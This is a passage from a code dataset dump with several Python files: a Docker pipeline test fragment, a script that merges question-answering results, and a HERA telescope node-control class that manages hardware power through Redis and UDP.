self.assertTrue('Wrong number of mirror mounts' in check_docker_output(\n base + sock + mirror + ['-v', '/bar:/bar'] + tool + args))\n\n\ndef check_docker_output(command, assert_1=True):\n process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n output = process.communicate()\n if assert_1:\n assert process.returncode == 1\n else:\n assert process.returncode == 0\n return output[0]\n\n\nif __name__ == '__main__':\n tag = 
sys.argv[1]\n del sys.argv[1]\n\n unittest.main()\n","sub_path":"rnaseq-cgl-pipeline/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"212886847","text":"#!/usr/bin/python3\n\nimport sys\nimport spacy\nimport re\nimport socket\n\nfrom sharedcode import *\nfrom xml.dom import minidom\n\nfrom s2020947 import get_answer_s2020947\nfrom s2576597 import get_answer_s2576597\nfrom s2995263 import get_answer_s2995263\n\n\n\n\n# Answer selection\ndef selectAnswers(line, answers1, answers2, answers3):\n output = list(set(answers1 + answers2 + answers3))\n # \"Yes Yes No\" => \"Yes No\" => \"Yes\"\n if \"Yes\" in output or \"yes\" in output and not \" or \" in line:\n return [\"Yes\"]\n # Check if there are two identical answers\n allanswers = [answers1, answers2, answers3]\n for List in allanswers:\n occurences = 0\n for List2 in allanswers:\n if List == List2 and List:\n occurences += 1\n if occurences > 1:\n return List\n # Remove duplicates\n if \" founded \" in line and answers2:\n return answers2\n if answers1:\n return answers1\n if answers2:\n return answers2\n return answers3\n\n\n\n# Start\n\nif socket.gethostname() == 'Aspire' or socket.gethostname() == 'DESKTOP-6OMO0PT':\n nlp = spacy.load(\"en\")\nelse:\n nlp = spacy.load(\"en_default\")\n\nxmldoc = minidom.parse(\"data/cleanquestions.xml\")\nitems = xmldoc.getElementsByTagName('question')\n \nprint(\"\\nReading anchor_texts to dictionary(about 20 seconds)\\nPlease wait...\")\nstart = time.time()\nanchor_dict = init_anchor_dict()\nprint(\"Completed in \" + str(time.time()-start) + \" seconds.\\n\")\n\ndebugLog(\"Ready\")\n\nfor item in items:\n line = item.getElementsByTagName('string')[0].firstChild.nodeValue\n temp = re.split('\\t', line)\n if len(temp) == 2:\n questionid = temp[0]\n question = temp[1]\n else:\n questionid = \"0\"\n question = line\n answers1 = answers2 = answers3 = []\n #try:\n answers2 = get_answer_s2020947(question, nlp, anchor_dict)\n #except:\n # pass\n #try:\n answers1 = get_answer_s2576597(question, nlp, anchor_dict)\n #except:\n # pass\n try:\n answers3 = get_answer_s2995263(question, nlp)\n except:\n pass\n #print(answers1, answers2, answers3)\n selected = selectAnswers(line, answers1, answers2, answers3)\n output = []\n output.append(str(questionid))\n for item in selected:\n output.append(str(item))\n print(str.join(\"\\t\", output))\n","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"116837383","text":"import json\nfrom datetime import datetime\nimport time\nfrom os import path as osp\nfrom . import send_receive, node_util, __version__\n\n\nMAX_NODES = 30\nOLD_AGE = 32000000 # old-age is just over a year seconds\nREDIS_KEEP_ALIVE_RESET_KEY = 'reset-node-keep-alive'\n\n\ndef get_redis_nodes(redisServer='redishost', count=None):\n nc = NodeControl(None, redisServer, count)\n return nc.nodes_in_redis\n\n\nclass NodeControl():\n \"\"\"\n This class is used to control power to PAM, FEM, and SNAP boards and\n get node status information through a Redis database.\n\n A range of nodes is requested when instantiated, then those are looked for\n in redis, then those are attempted to be connected. 
So:\n connected_nodes is a subset of nodes_in_redis is a subset of request_nodes\n Note that connected_nodes aren't necessarily connected, but the attempt just\n doesn't error out in a higher level sense. Using verdict/sentence can reduce\n to actually connected.\n\n It also provides a status for the White Rabbit\n\n Attributes\n ----------\n NC_KEY_INFO : dict\n Dictionary containing the redis status pre/post-fix information.\n hw : list\n List of hardware to check.\n power_switch : dict\n Power switch state.\n \"\"\"\n\n NC_KEY_INFO = {'wr_stat': ['status:wr:heraNode', 'wr', 'status:wr:'],\n 'nc_stat': ['status:node:', ''],\n 'nc_cmd': ['commands:node:', '']}\n hw = ['snap_relay', 'snap_0', 'snap_1', 'snap_2', 'snap_3', 'fem', 'pam']\n power_switch = {True: 'on', False: 'off'}\n\n def __init__(self, nodes, redisServer=\"redishost\", count=None, exclude_nodes=[]):\n \"\"\"\n Create a NodeControl class instance to query/control nodes.\n\n Parameters\n ----------\n nodes : int, list of int, 'all', None\n ID numbers of the nodes with which this instance of NodeControl will interact.\n If an IP address (or csv-list), then will just use those for communicating out.\n If 'all', will try 0-29.\n If None, it will _not_ get nodes_in_redis\n redisServer : str\n The hostname, or dotted quad IP address, of the machine running the node control and\n monitoring redis server\n count : int or None\n Number of status fields to make a node count as actually used.\n If None, reads from node_util.status_node\n exclude_nodes : list of ints (or empty)\n Will exclude these nodes.\n\n Attributes\n ----------\n request_nodes : list or None\n List of requested nodes (supplied)\n r : redis class\n Redis class to use\n nodes_in_redis : list\n List of all request_nodes in redis\n connected_nodes : list\n List of connected_nodes in nodes_in_redis\n sc_node : str\n String to print connected nodes\n status_node_keys : list\n List of the status:node keys\n \"\"\"\n self.explicit_ip = False\n self.r = node_util.get_redis_client(redisServer)\n self.set_request(nodes, exclude_nodes)\n self.reset_node_senders(full_reset=True)\n self.status_node_keys = list(node_util.status_node(None, None).keys())\n self.get_nodes_in_redis(count)\n\n def _get_stat_keys_from_redis(self):\n \"\"\"\n Go through redis and get all keys that start with the desired patterns.\n\n Called in get_nodes_in_redis.\n\n Attributes (from NC_KEY_INFO)\n ----------\n nc_stat : dict\n Redis key entries for status per node.\n nc_cmd : dict\n Redis key entries for commands per node.\n wr_stat : dict\n Redis key entries for wr status per node.\n\n \"\"\"\n for this_attr, key_info in self.NC_KEY_INFO.items():\n setattr(self, this_attr, {}) # set dictionary for nodes present\n for this_key in self.r.keys():\n for this_attr, key_info in self.NC_KEY_INFO.items():\n if this_key.startswith(key_info[0]):\n lstart = len(key_info[0])\n lstop = len(this_key) - len(key_info[1])\n try:\n this_node = int(this_key[lstart: lstop])\n except ValueError:\n continue\n getattr(self, this_attr)[this_node] = this_key\n\n def redis_keygen(self, rtype, nodeID):\n if nodeID > 29:\n return \"bad:nodeID:{}\".format(nodeID)\n if rtype == 'wr_stat' and str(nodeID).startswith('heraNode'):\n return \"{}{}\".format(self.NC_KEY_INFO[rtype][2], nodeID)\n return \"{}{}{}\".format(self.NC_KEY_INFO[rtype][0], nodeID, self.NC_KEY_INFO[rtype][1])\n\n def log_service_in_redis(self, this_file):\n rkey = \"version:{}:{}\".format(__package__, osp.basename(this_file))\n rval = {\"version\": __version__,\n 
\"timestamp\": datetime.now().isoformat()}\n self.r.hmset(rkey, rval)\n self.status_scriptname = \"status:script:{}:{}\".format(send_receive.THIS_HOST, this_file)\n\n def set_request(self, nodes, exclude_nodes):\n self.requested_nodes_query = nodes\n if isinstance(nodes, str):\n if nodes.lower() == 'all':\n self.request_nodes = list(range(MAX_NODES))\n elif '.' in nodes:\n self.explicit_ip = True\n self.request_nodes = nodes.split(',')\n else:\n try:\n self.request_nodes = [int(x) for x in nodes.split(',')]\n except ValueError:\n list_from_redis = self.r.get(nodes)\n if list_from_redis is not None:\n self.request_nodes = json.loads(list_from_redis)\n else:\n self.request_nodes = list(range(MAX_NODES))\n elif isinstance(nodes, (int, float)):\n self.request_nodes = [int(nodes)]\n elif isinstance(nodes, list) or nodes is None:\n self.request_nodes = nodes\n else:\n raise ValueError(f\"Invalid 'nodes' type: {nodes}\")\n for exno in exclude_nodes:\n if exno in self.request_nodes:\n self.request_nodes.remove(exno)\n\n def get_nodes_list_from_redis(self, nodes):\n return self.r.get(nodes)\n\n def get_nodes_in_redis(self, count=None):\n \"\"\"\n Get redis nodes list for those in request_nodes.\n\n Parameters\n ----------\n count : int or None\n Number of status fields to make a node count as actually used.\n If None, get length from status_node_keys (all)\n\n Attributes\n ----------\n nodes_in_redis : list\n List of all request_nodes in redis with >count status fields\n \"\"\"\n self._get_stat_keys_from_redis() # gets self.nc_stat (and self.wr_stat and self.nc_cmd)\n if self.request_nodes is None or self.explicit_ip:\n return\n if count is None:\n count = len(self.status_node_keys)\n self.nodes_in_redis = []\n for node in self.request_nodes:\n if node not in self.nc_stat:\n continue\n try:\n ts = self.r.hget(self.nc_stat[node], 'timestamp')\n except KeyError:\n ts = 0\n if ts == -1:\n len_entries = len(self.status_node_keys) + 1\n else:\n len_entries = len(self.r.hgetall(self.nc_stat[node]))\n if node in self.nc_stat and len_entries >= count:\n self.nodes_in_redis.append(node)\n\n def reset_node_senders(self, full_reset=False):\n self.connected_nodes = []\n self.senders = {}\n self.requested_included = {}\n self.sc_node = ''\n if full_reset:\n self.nodes_in_redis = []\n\n def get_node_senders(self, throttle=0.1):\n \"\"\"\n Get udp node class for requested nodes that are in redis.\n\n Every node in redis gets a sender class, differentiated by the sender.node_is_connected flag.\n\n Parameters\n ----------\n throttle : float\n waiting time\n\n Attributes\n ----------\n senders : dict\n Sender classes keyed on node_id (int)\n connected_nodes : list\n List of all udp connected request_nodes\n sc_node : str\n String to print connected nodes\n \"\"\"\n self.connected_nodes = []\n if self.explicit_ip:\n nodes_to_check = self.request_nodes\n else:\n nodes_to_check = self.nodes_in_redis\n for node in nodes_to_check:\n if node in self.senders.keys():\n if self.senders[node].node_is_connected:\n self.connected_nodes.append(node)\n else:\n hkey = self.redis_keygen('nc_stat', node)\n # ip = self.r.hget(hkey, 'ip') # use name not number\n if self.explicit_ip:\n ip = node\n else:\n ip = f\"heraNode{node}\"\n self.senders[node] = send_receive.UdpSenderReceiver(ip, throttle=throttle)\n if self.senders[node].node_is_connected:\n self.connected_nodes.append(node)\n _ping = self.senders[node].pingable\n self.r.hset(hkey, 'udp_status', 'ping {}/{} : {}s'\n .format(_ping['rcvd'], _ping['sent'], _ping['avg']))\n else:\n self.r.hset(hkey, 
'udp_status', 'not connected')\n if len(self.connected_nodes):\n s = 's' if len(self.connected_nodes) > 1 else ''\n self.sc_node = \"Node{} {}\".format(s, ', '.join([str(x) for x in self.connected_nodes]))\n else:\n self.sc_node = \"No requested nodes connected.\"\n\n def get_sensors(self):\n \"\"\"\n Get the current node sensor values from redis.\n\n Returns a dict where `timestamp` is a python `time` float describing when the\n sensor values were last updated in redis, and `sensors` is a dictionary of sensor values.\n If a sensor value is not available (e.g. because it cannot be reached) it will be `None`.\n\n Valid sensor keywords are:\n 'temp_top' (float) : Temperature, in degrees C, reported by top node sensor.\n 'temp_mid' (float) : Temperature, in degrees C, reported by middle node sensor.\n 'temp_bot' (float) : Temperature, in degrees C, reported by bottom node sensor.\n 'temp_humid' (float) : Temperature, in degrees C, reported by humidity sensor.\n 'humid' (float) : Relative Humidity, in percent, reported by humidity sensor.\n 'cpu_uptime_ms' (int) : Uptime of this node control module, in milliseconds\n 'ip' (str) : IP address of node controller module, e.g. \"10.1.1.123\"\n 'mac' (str) : MAC address of node controller module, e.g. \"02:03:04:05:06:07\"\n \"\"\"\n conv_methods = {\n \"temp_bot\": float,\n \"temp_mid\": float,\n \"temp_top\": float,\n \"temp_humid\": float,\n \"humid\": float,\n \"ip\": str,\n \"mac\": str,\n \"cpu_uptime_ms\": int,\n \"timestamp\": float\n }\n sensors = {}\n now = time.time()\n self.requested_included['sensor'] = []\n for node, stat_key in self.nc_stat.items():\n if self.request_nodes is not None and node in self.request_nodes:\n self.requested_included['sensor'].append(node)\n stats = self.r.hgetall(stat_key)\n sensors[node] = {'age': OLD_AGE}\n for key, convfunc in conv_methods.items():\n try:\n sensors[node][key] = convfunc(stats[key])\n if key == 'timestamp':\n try:\n sensors[node]['age'] = now - sensors[node][key]\n except ValueError:\n pass\n except: # noqa\n sensors[node][key] = None\n self.requested_included['sensor'] = sorted(self.requested_included['sensor'])\n return sensors\n\n def get_power_command_list(self):\n \"\"\"\n Get the current node power commands from redis.\n\n Returns a dict keyed on node|part|timestamp/age/command\n\n Valid power command keys are:\n power_snap_relay_cmd\n power_snap_0_cmd\n power_snap_1_cmd\n power_snap_2_cmd\n power_snap_3_cmd\n power_fem_cmd\n power_pam_cmd\n reset\n Format of values for all is on/off/reset|time(unix)\n \"\"\"\n valid = [\"power_{}_cmd\".format(x) for x in self.hw] + ['reset']\n power = {}\n now = time.time()\n for node, cmd_key in self.nc_cmd.items():\n statii = self.r.hgetall(cmd_key)\n power[node] = {}\n for key in list(statii.keys()):\n if key not in valid:\n continue\n if 'relay' in key:\n this_key = 'snap_relay'\n elif 'snap' in key:\n this_key = \"snap{}\".format(key.split('_')[2])\n elif 'reset' in key:\n this_key = 'reset'\n else:\n this_key = key.split('_')[1]\n stad = statii[key].split('|')\n try:\n this_timestamp = float(stad[1])\n this_age = now - this_timestamp\n except (IndexError, ValueError):\n this_timestamp = -99\n this_age = -99\n power[node][this_key] = {'timestamp': this_timestamp,\n 'age': this_age,\n 'command': stad[0]}\n return power\n\n def enable_snap_monitor(self, disabler='IGNORE'):\n \"\"\"\n If snap monitor was disabled by `disabler`, re-enable it.\n \"\"\"\n if self.r.exists('disable_monitoring'):\n disabled_by = self.r.get('disable_monitoring')
\n if disabled_by == disabler:\n self.r.delete('disable_monitoring')\n return 'Enabling'\n return f'Not enabled since disabled by {disabled_by} not {disabler}'\n return 'Already enabled'\n\n def disable_snap_monitor(self, disabler='hera_node_mc.disable_snap_monitor'):\n \"\"\"\n Disable snap monitor, attributing it to `disabler`.\n \"\"\"\n if not self.r.exists('disable_monitoring'):\n distag = \"{}:{}\".format(disabler, datetime.now().isoformat())\n self.r.set('disable_monitoring', distag)\n return 'Disabling'\n else:\n disabled_by = self.r.get('disable_monitoring')\n return f'Already disabled by {disabled_by}'\n\n def snap_monitor_check_and_set(self, age_cutoff=600.0):\n \"\"\"\n Check the powered state of all of the snaps and disable if appropriate.\n\n If nodes to use is 'all' and all snaps are off, set disable_monitoring flag\n in redis. If any are on and the disable flag was set by this method, remove\n the flag.\n\n Parameters\n ----------\n age_cutoff : float\n time (sec) cutoff for using the power state\n \"\"\"\n power_data = self.get_power_status()\n # check all snaps and snap relay to allow monitoring.\n all_snap_off = True\n for node, pwr in power_data.items():\n if 'age' in pwr.keys() and pwr['age'] < age_cutoff:\n for key in ['power_snap_0', 'power_snap_1', 'power_snap_2', 'power_snap_3']:\n if key in pwr.keys() and pwr[key] is True:\n all_snap_off = False\n break\n if not all_snap_off:\n break\n if all_snap_off:\n return self.disable_snap_monitor('hera_node_mc.snap_monitor_check_and_set')\n return self.enable_snap_monitor('hera_node_mc.snap_monitor_check_and_set')\n\n def get_power_status(self):\n \"\"\"\n Get the current node power relay states from redis.\n\n Returns a dict where `timestamp` is a python `time` float\n describing when the values were last updated in redis, and `statii` is a dictionary\n of booleans for the various power switches the node can control. 
For each entry in this\n dictionary, `True` indicates power is on, `False` indicates power is off.\n\n Valid power status keys are:\n 'power_fem' (Power of Front-End modules)\n 'power_pam' (Power of Post-amplifier modules)\n 'power_snap_0' (Power of first SNAP)\n 'power_snap_1' (Power of second SNAP)\n 'power_snap_2' (Power of third SNAP)\n 'power_snap_3' (Power of fourth SNAP)\n 'power_snap_relay' (Power of master SNAP relay)\n \"\"\"\n power = {}\n now = time.time()\n self.requested_included['power'] = []\n for node, stat_key in self.nc_stat.items():\n if self.request_nodes is not None and node in self.request_nodes:\n self.requested_included['power'].append(node)\n statii = self.r.hgetall(stat_key)\n power[node] = {'age': OLD_AGE}\n for key in list(statii.keys()):\n if key == 'timestamp':\n try:\n power[node]['timestamp'] = float(statii[key])\n power[node]['age'] = now - float(statii[key])\n except ValueError:\n power[node]['timestamp'] = -99\n power[node]['age'] = -99\n elif key.startswith(\"power\"):\n power[node][key] = node_util.str2bool(statii[key])\n self.requested_included['power'] = sorted(self.requested_included['power'])\n return power\n\n def get_wr_status(self):\n \"\"\"\n Get the current status of this node's White Rabbit endpoint (assumed to have hostname\n `heraNodewr`) from redis.\n\n If no stats exist for this White Rabbit endpoint, returns `None`.\n\n Otherwise Returns a dict where `timestamp` is a python `timestamp` describing when\n the values were last updated in redis, and `statii` is a dictionary of status values.\n\n If a status value is not available it will be `None`\n\n Valid status keywords are:\n 'board_info_str' (str) : A raw string representing the WR-LEN's response to the\n `ver` command. Relevant parts of this string are\n individually unpacked in other entries.\n 'aliases' (list of strings) : Hostname aliases of this node's WR-LEN\n 'ip' (str) : IP address of this node's WR-LEN\n 'mode' (str) : WR-LEN operating mode (eg. \"WRC_SLAVE_WR0\")\n 'serial' (str) : Canonical HERA hostname (~=serial number) of node's WR-LEN\n 'temperature' (float) : WR-LEN temperature in degrees C\n 'sw_build_date' (timestamp) : Build date of WR-LEN software\n 'wr_gw_date' (timestamp) : WR-LEN gateware build date\n 'wr_gw_version' (str) : WR-LEN gateware version number\n 'wr_gw_id' (str) : WR-LEN gateware ID number\n 'wr_build' (str) : WR-LEN build git hash\n 'wr_fru_custom' (str) : Custom manufacturer tag'\n 'wr_fru_device' (str) : Manufacturer device name designation\n 'wr_fru_fid' (timestamp) : Manufacturer invoice(?) date\n 'wr_fru_partnum' (str) : Manufacturer part number\n 'wr_fru_serial' (str) : Manufacturer serial number\n 'wr_fru_vendor' (str) : Vendor name\n The following entries are prefixed `wr0` or `wr1` for WR-LEN ports 0 and 1,\n respectively. Most values will only be not None for one of the two ports.\n 'wr[0|1]_ad' (int) : ???\n 'wr[0|1]_asym' (int) : Total link asymmetry (ps)\n 'wr[0|1]_aux' (int) : ??? 
Manual phase adjustment (ps)\n 'wr[0|1]_cko' (int) : Clock offset (ps)\n 'wr[0|1]_crtt' (int) : Cable round-trip delay (ps)\n 'wr[0|1]_dms' (int) : Master-Slave delay in (ps)\n 'wr[0|1]_drxm' (int) : Master RX PHY delay (ps)\n 'wr[0|1]_drxs' (int) : Slave RX PHY delay (ps)\n 'wr[0|1]_dtxm' (int) : Master TX PHY delay (ps)\n 'wr[0|1]_dtxs' (int) : Slave TX PHY delay (ps)\n 'wr[0|1]_hd' (int) : ???\n 'wr[0|1]_lnk' (bool) : Link up state\n 'wr[0|1]_lock' (bool) : Timing lock state\n 'wr[0|1]_md' (int) : ???\n 'wr[0|1]_mu' (int) : Round-trip time (ps)\n 'wr[0|1]_nsec' (int) : ???\n 'wr[0|1]_rx' (int) : Number of packets received\n 'wr[0|1]_setp' (int) : Phase setpoint (ps)\n 'wr[0|1]_ss' (str) : Servo state\n 'wr[0|1]_sv' (int) : ???\n 'wr[0|1]_syncs' (str) : Source of synchronization (either 'wr0' or 'wr1')\n 'wr[0|1]_tx' (int) : Number of packets transmitted\n 'wr[0|1]_ucnt' (int) : Update counter\n 'wr[0|1]_sec' (int) : Current TAI time in seconds from UNIX epoch\n \"\"\"\n conv_methods = {\n 'board_info_str': str,\n 'aliases': json.loads,\n 'ip': str,\n 'mode': str,\n 'serial': str,\n 'temp': float,\n 'timestamp': str,\n 'sw_build_date': str,\n 'wr_gw_date': str,\n 'wr_gw_version': str,\n 'wr_gw_id': str,\n 'wr_build': str,\n 'wr_fru_custom': str,\n 'wr_fru_device': str,\n 'wr_fru_fid': str,\n 'wr_fru_partnum': str,\n 'wr_fru_serial': str,\n 'wr_fru_vendor': str,\n '_ad': int,\n '_asym': int,\n '_aux': int,\n '_cko': int,\n '_crtt': int,\n '_dms': int,\n '_drxm': int,\n '_drxs': int,\n '_dtxm': int,\n '_dtxs': int,\n '_hd': int,\n '_lnk': bool,\n '_lock': bool,\n '_md': int,\n '_mu': int,\n '_nsec': int,\n '_rx': int,\n '_setp': int,\n '_ss': str,\n '_sv': int,\n '_syncs': str,\n '_tx': int,\n '_ucnt': int,\n '_sec': int\n }\n wrstat = {}\n self.requested_included['wr'] = []\n for node, stat_key in self.wr_stat.items():\n if self.request_nodes is not None and node in self.request_nodes:\n self.requested_included['wr'].append(node)\n stats = self.r.hgetall(stat_key)\n wrstat[node] = {}\n for key, convfunc in conv_methods.items():\n if key.startswith('_'):\n for i in range(2):\n port_key = ('wr%d' % i) + key\n try:\n wrstat[node][port_key] = convfunc(stats[port_key])\n except: # noqa\n wrstat[node][port_key] = None\n else:\n try:\n wrstat[node][key] = convfunc(stats[key])\n except: # noqa\n wrstat[node][key] = None\n self.requested_included['wr'] = sorted(self.requested_included['wr'])\n return wrstat\n\n def verdict(self, hwcmd, verbose=True, hold_for_verify=120,\n verify_mode='all', show_success=False):\n \"\"\"\n Checks if commands are actually carried out - needs hera-node-receiver service running.\n\n Uses _verify_states to make sure the hardware commands were set as requested.\n Note that it bases off of connected_nodes, not requested_nodes.\n\n Parameters\n ----------\n hwcmd : dict\n Dict of hardware to check and the commands (on or off)\n hold_for_verify : int\n Length of time till timeout (seconds)\n verify_mode : str\n Type of verification to check (see _verify_states)\n show_success : bool\n Flag to also show success rather than just failure.\n \"\"\"\n if verbose:\n print(\"...Verifying...\", end='')\n lenhw = len(hwcmd.keys())\n if hold_for_verify <= 0:\n print(\"No verdict hold time - not checking.\")\n return\n elif not lenhw:\n print(\"No hardware to check verdict.\")\n return\n started = time.time()\n age = 0.0\n node_counter = {}\n all_verified = False\n while age < hold_for_verify:\n countdown = len(self.connected_nodes) * lenhw # total to check\n _verdict = 
self._verify_states(hwcmd)\n for node in self.connected_nodes:\n node_counter[node] = lenhw\n for this_hw in hwcmd.keys():\n if _verdict[node][this_hw][verify_mode]:\n countdown -= 1\n node_counter[node] -= 1\n if not countdown: # all OK so can quit loop\n all_verified = True\n if verbose:\n print(\"...all ok\")\n break\n time.sleep(1) # Wait 1 second for next check.\n age = time.time() - started\n if verbose and not all_verified:\n print(\"...timeout {:.1f}\".format(age))\n node_counter['hwcmd'] = hwcmd\n node_counter['mode'] = verify_mode\n node_counter['timeout'] = hold_for_verify\n node_counter['age'] = age\n node_counter['time'] = time.time()\n if verbose:\n for node in self.connected_nodes:\n for this_hw in _verdict[node].keys():\n if not _verdict[node][this_hw][verify_mode]:\n print(\"FAIL Node {} turned {} {}\".format(\n node, this_hw, hwcmd[this_hw]))\n elif show_success:\n print(\"SUCCESS Node {} turned {} {}\".format(\n node, this_hw, hwcmd[this_hw]))\n return node_counter\n\n def sentence(self, results, error_threshold=1.0, purge=True):\n \"\"\"\n Determine what to do with the verdict.\n\n Computes the error fraction and raises an error if it exceeds the threshold.\n\n Parameters\n ----------\n results : bool or dict\n Returned from self.verdict\n error_threshold : float\n Threshold fractional value per node over which to raise an error.\n 0.0 will error if any node was unsuccessful\n 1.0 will never error\n purge : bool\n If True, remove unsuccessful nodes from self.connected_nodes.\n\n Returns\n -------\n float\n computed error fraction: 0 - 1\n \"\"\"\n if results is None:\n return 0.0\n if isinstance(results, bool) and results:\n return 0.0 # All good (none failed)!\n failed = []\n incoming_total = len(self.connected_nodes)\n for node in list(self.connected_nodes): # iterate a copy since purge may remove nodes\n if results[node]: # there were some left over so didn't all work\n failed.append(node)\n if purge:\n self.connected_nodes.remove(node)\n error_fraction = len(failed) / incoming_total\n if error_threshold < 1.0 and error_fraction > error_threshold:\n msg = \"{} of {} nodes failed.\".format(len(failed), incoming_total)\n raise RuntimeError(msg)\n if purge and len(failed) > 0:\n print(\"{} removed from connected_nodes.\".format(failed))\n return error_fraction\n\n def _verify_states(self, hwcmd):\n \"\"\"\n Check the state of hardware in nodes - command and status.\n\n Parameters\n ----------\n hwcmd : dictionary of hardware and on/off command.\n\n Returns\n -------\n dict\n keyed on node, and mode: 'time', 'agree', 'cmd', 'stat', 'all'\n each one is a bool\n \"\"\"\n # Prep the lists.\n if 'all' in hwcmd.keys():\n verify_hw = self.hw\n verify_cmd = [hwcmd['all'] for x in verify_hw]\n else:\n verify_hw = list(hwcmd.keys())\n verify_cmd = [hwcmd[x] for x in verify_hw]\n verify_hw = [x.lower() for x in verify_hw]\n verify_cmd = [x.lower() for x in verify_cmd]\n\n # Get from redis\n pcmd = self.get_power_command_list()\n pstat = self.get_power_status()\n\n # Verify\n verification = {}\n for node in self.connected_nodes:\n verification[node] = {}\n for vhw, vcmd in zip(verify_hw, verify_cmd):\n verification[node][vhw] = {}\n shw = 'power_{}'.format(vhw)\n chw = vhw.replace('_', '') if 'relay' not in vhw else vhw\n try:\n verification[node][vhw]['time'] = (pcmd[node][chw]['timestamp'] <\n pstat[node]['timestamp'])\n except KeyError:\n verification[node][vhw]['time'] = False\n try:\n pcmdvhw = pcmd[node][chw]['command']\n except KeyError:\n pcmdvhw = None\n verification[node][vhw]['cmd'] = pcmdvhw == vcmd\n pstatvhw = 'on' if pstat[node][shw] else 'off'\n verification[node][vhw]['stat'] = pstatvhw == vcmd\n verification[node][vhw]['agree'] = pcmdvhw == pstatvhw\n verification[node][vhw]['all'] = True\n for thisv in ['time', 'cmd', 'stat', 'agree']:\n if not verification[node][vhw][thisv]:\n verification[node][vhw]['all'] = False\n break\n return verification\n\n def _log_cmd_to_redis(self, node, component, tstamp, cmd):\n key = self.redis_keygen('nc_cmd', node)\n val = \"{}|{}\".format(cmd, tstamp)\n cmp = \"{}_cmd\".format(component)\n self.r.hset(key, cmp, val)\n\n def _change_state_nodes(self, command, hw, print_stat=False):\n if not len(self.connected_nodes):\n print(\"No nodes connected.\")\n return []\n pstat = self.get_power_status()\n change_node = []\n for cnode in self.connected_nodes:\n try:\n if command != self.power_switch[pstat[cnode][hw]]:\n change_node.append(cnode)\n except KeyError:\n change_node.append(cnode)\n if print_stat:\n prhw = hw.strip('power').replace('_', ' ').strip()\n if len(change_node):\n s = 's' if len(change_node) > 1 else ''\n prnd = \"Node{} {}\".format(s, ', '.join([str(x) for x in change_node]))\n print(\"Turning {} {}{} for {}\".format(command, prhw, s, prnd))\n else:\n s = 's' if len(self.connected_nodes) > 1 else ''\n print(\"{}{} already {}\".format(prhw, s, command))\n return change_node\n\n def power_snap_relay(self, command, hold_for_verify=120, verify_mode='all'):\n \"\"\"\n Controls the node snap relay via arduino.\n\n The SNAP relay has to be turned on before sending commands to individual SNAPs.\n It logs the command to redis as status:node:N->power_snap_relay_cmd. If turning on,\n it checks for success, since it is the 1st of 2 stages to turn on SNAPs.\n\n Parameters\n ----------\n command : str\n on or off\n hold_for_verify : int\n Since the snap_relay has to be on first, you can hold that many seconds until\n it is verified that it is on (only on, not off). 
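If verification times out, the failing nodes are purged from connected_nodes via sentence(). 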
Ignore if 0.\n verify_mode : str\n One of the keys in the verification dict\n \"\"\"\n change_node = self._change_state_nodes(command, 'power_snap_relay', print_stat=True)\n if not len(change_node):\n return\n tstamp = int(time.time())\n for node in change_node:\n self._log_cmd_to_redis(node, 'power_snap_relay', tstamp, command)\n self.senders[node].power_snap_relay(command)\n if command == 'on' and hold_for_verify > 0:\n _r = self.verdict({'snap_relay': 'on'}, False,\n hold_for_verify=hold_for_verify, verify_mode=verify_mode)\n self.snap_relay_error_fraction = self.sentence(_r, 1.0, purge=True)\n\n def power_snap(self, snap_n, command):\n \"\"\"\n Controls the power to snaps via arduino.\n\n It logs the command to redis as status:node:N->power_snap_N_cmd.\n\n Parameters\n ----------\n snap_n : int (or str representation of int)\n Number of snap to address.\n command : str\n on or off\n \"\"\"\n this_snap = f\"power_snap_{snap_n}\"\n change_node = self._change_state_nodes(command, this_snap, print_stat=True)\n if not len(change_node):\n return\n tstamp = int(time.time())\n for node in change_node:\n self._log_cmd_to_redis(node, this_snap, tstamp, command)\n self.senders[node].power_snap(snap_n, command)\n\n def power_fem(self, command):\n \"\"\"\n Controls the power to FEM via arduino.\n\n It logs the command to redis as status:node:N->power_fem_cmd.\n\n Parameter\n ---------\n command : str\n on or off\n \"\"\"\n change_node = self._change_state_nodes(command, 'power_fem', print_stat=True)\n if not len(change_node):\n return\n tstamp = int(time.time())\n for node in change_node:\n self._log_cmd_to_redis(node, 'power_fem', tstamp, command)\n self.senders[node].power_fem(command)\n\n def power_pam(self, command):\n \"\"\"\n Controls the power to PAM via arduino.\n\n It logs the command to redis as status:node:N->power_pam_cmd.\n\n Parameter\n ---------\n command : str\n on or off\n \"\"\"\n change_node = self._change_state_nodes(command, 'power_pam', print_stat=True)\n if not len(change_node):\n return\n tstamp = int(time.time())\n for node in change_node:\n self._log_cmd_to_redis(node, 'power_pam', tstamp, command)\n self.senders[node].power_pam(command)\n\n def reset(self):\n \"\"\"\n Sends the reset command to Arduino which restarts the bootloader.\n\n It logs the command to redis as status:node:N->reset\n \"\"\"\n if not len(self.connected_nodes):\n print(\"No nodes connected.\")\n return\n tstamp = int(time.time())\n print(\"Resetting {}\".format(self.sc_node))\n for node in self.connected_nodes:\n self._log_cmd_to_redis(node, 'reset', tstamp, 'reset')\n self.senders[node].reset()\n","sub_path":"node_control/node_control.py","file_name":"node_control.py","file_ext":"py","file_size_in_byte":35204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"168683884","text":"# Copyright @ 2021 Thought Machine Group Limited. 
